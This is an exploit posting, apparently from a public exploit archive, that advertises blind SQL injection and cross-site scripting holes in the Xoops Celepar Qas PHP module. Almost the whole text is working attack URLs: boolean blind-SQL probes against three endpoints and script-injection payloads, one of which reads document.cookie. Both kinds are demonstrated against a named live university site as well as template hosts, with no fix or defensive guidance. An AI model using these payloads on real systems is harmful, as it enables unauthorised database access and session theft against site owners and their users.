The Xoops Celepar Qas module suffers from blind SQL injection and cross site scripting vulnerabilities.
33ea8a1be54c26a80e1c81d5826a0f3947d40730eec5abf0769ce78f73e2cda7
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[»] Xoops Celepar Module Qas (bSQL/XSS) Multiple Remote Vulnerabilities
==============================================================================
[»] Script: [ Xoops Celepar Module Qas ]
[»] Language: [ PHP ]
[»] Download: [ https://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz ]
[»] Founder: [ Moudi <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ OFF ]
[»] Price: [ FREE ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===
[»] https://www.site.com/patch/categoria.php?cod_categoria=[BLIND]
[»] https://www.site.com/patch/imprimir.php?codigo=[BLIND]
[»] https://www.site.com/patch/aviso.php?codigo=[BLIND]
[»] https://www.dce.uem.br/modules/qas/categoria.php?cod_categoria=1 and 1=1 <= TRUE
[»] https://www.dce.uem.br/modules/qas/categoria.php?cod_categoria=1 and 1=2 <= FALSE
[»] https://www.dce.uem.br/modules/qas/imprimir.php?codigo=1 and 1=1 <= TRUE
[»] https://www.dce.uem.br/modules/qas/imprimir.php?codigo=1 and 1=2 <= FALSE
[»] https://www.dce.uem.br/modules/qas/aviso.php?codigo=1 and 1=1 <= TRUE
[»] https://www.dce.uem.br/modules/qas/aviso.php?codigo=1 and 1=2 <= FALSE
===[ Exploit XSS + LIVE : vulnerability ]===
[»] https://www.site.com/patch/categoria.php?cod_categoria=[XSS]
[»] https://www.site.com/patch/index.php?opcao=[XSS]
[»] https://www.site.com/patch/categoria.php/[XSS]
[»] https://www.site.com/patch/index.php/[XSS]
[»] https://www.dce.uem.br/modules/qas/categoria.php?cod_categoria="><script>alert(document.cookie);</script>
[»] https://www.dce.uem.br/modules/qas/index.php?opcao=1>'><ScRiPt %0A%0D>alert(439286918587)%3B</ScRiPt>
[»] https://www.dce.uem.br/modules/qas/categoria.php/>'><ScRiPt>alert(665068655391)</ScRiPt>
[»] https://www.dce.uem.br/modules/qas/index.php/>'><ScRiPt>alert(657988605523)</ScRiPt>
Author: Moudi
###########################################################################